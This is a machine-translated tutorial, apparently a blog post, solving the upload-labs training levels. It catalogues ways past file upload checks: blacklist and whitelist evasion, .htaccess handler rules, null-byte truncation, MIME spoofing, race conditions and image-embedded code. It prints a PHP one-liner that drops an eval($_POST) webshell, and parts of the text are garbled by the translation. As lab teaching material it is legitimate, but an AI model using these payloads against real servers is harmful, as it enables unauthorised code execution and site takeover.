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File upload bypass summary (upload labs 21 customs clearance tutorial attached)

2022-07-05 04:15:00 Two ladies' post it notes

0x01 Front end bypass (Less-1)

After the data is uploaded, it is submitted to the server , But because of the website page js Filter it , Confirm whether you can upload , Delete restricted uploads js Rules are enough .

0x02 Back end bypass

1. Blacklist bypasses

1) Upload special resolvable suffix (Less-3)

As usual, change the suffix to php Found that uploading is not allowed .asp,.aspx,.php,.jsp Suffix file ! The blacklist
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Try php2、php3、php4 Special suffixes such as
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2) Upload .htaccess (Less-4)

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$deny_ext=array There are no restrictions in the blacklist .htaccess Postfix file , Therefore use .htaccess Suffix bypass .
htaccess File a file containing one or more instructions is placed in a specific document directory , To apply to this directory and all its subdirectories . As the user , The commands available are limited .
.htaccess:apache Expand the configuration file , It can be in the same directory as the parsing file

Prerequisite :1.mod_rewrite Module on .2.AllowOverride All

<FilesMatch "、1.png">
SetHandler application/x-httpd-php    #1.png The file will be treated as php Parsing 

<IfModule mime_module>
SetHandler application/x-httpd-php    # In the current directory , All files will be parsed into php Code execution 

SetHandler application/x-httpd-php  # All documents will be treated as php Parsing 

First upload a .htaccess The file of
The content of the document is
 Insert picture description here
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Then upload .png Pictures of horses
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Upload successful
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3) Case around (Less-6)

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4) Point around (Less-8)

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5) Space around (Less-7)

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Found no spaces removed
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6) ::$DATA Bypass (Less-9)

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Through source code discovery , Not removed ::$DATA
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7) Cooperate with parsing vulnerability (Less-19)

Due to some mistake , Before starting the operation, you need to change the path where the file is stored after uploading
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lookup $this->cls_upload_dir Change the path of the uploaded file to upload
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Let's look at the source code , Find the server to compare the file suffix with the white list , Therefore, you can no longer upload php file , Only pictures can be uploaded , Access before it is renamed , Picture horse execution with other vulnerabilities , If the file contains ,apache Parsing vulnerabilities and so on .
 Insert picture description here


1<?php fputs(fopen("info.php", "w"), '<?php @eval($_POST["upload"]);?>); ?>

Just visit shell.php,php The file will be successfully parsed and executed , Automatically create info.php file , Write a sentence about Trojan horse <?php @eval($_POST["upload"]);?>.
Or use shell.php, Make a picture of the horse , utilize bp Perform multi-threaded replay of packets , Running at the same time py file , When there is a ok when , Instructions are also generated info.php

import requests
url = ""
while True:
    html = requests.get(url)
    if ( 'Warning'  not in  str(html.text)):

Then use ant sword to connect url

8) Double suffixes bypass (Less-11)

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2. White list bypass

1) MIME Bypass (Less-2)

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Directly modifying Content-Type

2) %00 truncation (Less-12、Less-20)

  • Less-12
    File path %00 truncation
     Insert picture description here
    Use $img_path Splicing , So you can use %00 Cut and bypass , But two conditions need to be met .
    Meet the conditions :php Version less than 5.3.4;php.ini in magic_quotes_gpc = Off
     Insert picture description here
    Upload a 1.png The file of , stay save_path=…/upload Add after /1.php%00
     Insert picture description here

  • Less-20
     Insert picture description here
    You can see move_uploaded_file() Function img_path By post Parameters save_name The control of the , So we can pass %00 Truncation to bypass . Methods with Less-13.
     Insert picture description here

3) 0x00 truncation (Less-13)

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save_path Parameters through POST Means of transmission , Or use 00 truncation , because POST Don't like GET Yes %00 Automatic decoding , So you need to modify it yourself .
Php5.3 The above does not support
Php.ini in magic_quotes_gpc = Off
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stay upload Add after /1.php, Choose .php Space after , Code changed to hex, Change the number to 00, Click on Apply changes. Be careful : I'm here bp It uses 2020 edition , Previous versions were directly in resquest Change in hex
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if request Is inconsistent with mine , Just change the format
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 Insert picture description here

4) 0x0a truncation

3. Other types

1) Conditional competition (Less-18、Less-19)

  • Less-18
     Insert picture description here

File upload to server , Judge whether the file suffix is on the white list , If in , Rename ; otherwise , Delete .

1<?php fputs(fopen("info.php", "w"), '<?php @eval($_POST["upload"]);?>); ?>

Just visit shell.php,php The file will be successfully parsed and executed , Automatically create info.php file , Write a sentence about Trojan horse <?php @eval($_POST["upload"]);?>.

utilize bp Of intruder Module multi thread replay packet , Constantly refresh the access address
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 Insert picture description here
then start attack
I didn't use py. Please refer to :

  • Less-19
    For details, see Blacklist bypasses - Cooperate with parsing vulnerability

2) Header check (Less-14)

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Judge the file type by the first two bytes of the file , Just upload the picture code directly .
Cmd command copy 1.jpg /b + 1.php /a 1.jpg Make pictures of horses
Or use kali
cat 3.php >>3.jpg
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3) breakthrough getimagesize() (Less-15)

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adopt getimagesize() Function to determine the file type , So you can also use pictures of horses .

4) breakthrough exif_imagetype() (Less-16)

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adopt exif_imagetype() Function to determine the file type , So you can also use pictures of horses .

5) The second rendering bypasses (Less-17)

 Insert picture description here
Second rendering principle : Upload the normal picture to the server , Although the outside of the file will not change after uploading , But part hex The value will change , Look for the same part of the rendered image as the original image , Insert a sentence into this part , Upload webshell
The specific implementation needs to be written by myself Python Program , It is basically impossible to construct an image that can bypass the rendering function by manual attempt webshell Of

0x03 Bypass the summary

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0x04 upload-labs Remaining levels in the shooting range

  • Less-5
    spot + Space + Point around
     Insert picture description here
    $deny_ext=array Blacklists limit most upload suffixes
    Check the code and find obvious defects , Delete the point in the stomach , Ending empty characters , Delete ::$DATA, So you can use ”. .” To bypass , namely bp Change suffix to “.php. .“ To verify the blacklist .

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  • Less-10
    spot + Space + Point around , Specific reference to Less-5

  • Less-21
     Insert picture description here
    According to source code , We can know that the server side first checks MIME type , And then determine save_name Whether the parameter is empty , If it is empty, assign the original name of the file to f i l e , no be Just yes take s a v e n a m e ginseng Count Of value Fu to it . tight Pick up the sentence break file, Otherwise, it will save_name The value of the parameter is assigned to it . Then judge file, Otherwise, it will savename The value of the parameter is assigned to it . Then judge file Is it an array . If it is not an array, break it into an array , Then the last value of the array (end Function is to take the value of the last array ) Compare with the white list , accord with jpg、png、gif One of them is allowed to upload .
    After uploading is allowed, the values of the array should be spliced together to rename the file . So we can construct save_name[0]=1.php/ save_name[1] Set to empty save_name[2]=jpg( A legal suffix to the white list ). In this case ,reset($file) Take the first element of the array, that is 1.php/, And then I got one ’.' Symbol , Then the contents of the last element of the array are spliced together . Although the last value of the array is jpg, But when we only set two array elements , There are only two elements in the array . So the splicing is empty , So the final file name is 1.php/.. Again because move_uploaded_file() The function ignores the... At the end of the file /., So we uploaded it to the server
    The file was renamed to php suffix .

 Bypass method :
1. take Content-Type It is amended as follows jpg Format 
2. stay save_name Add a parameter at [0]
3. take upload-20.jpg Change it to upload-20.php/
4. add to jpg Format 

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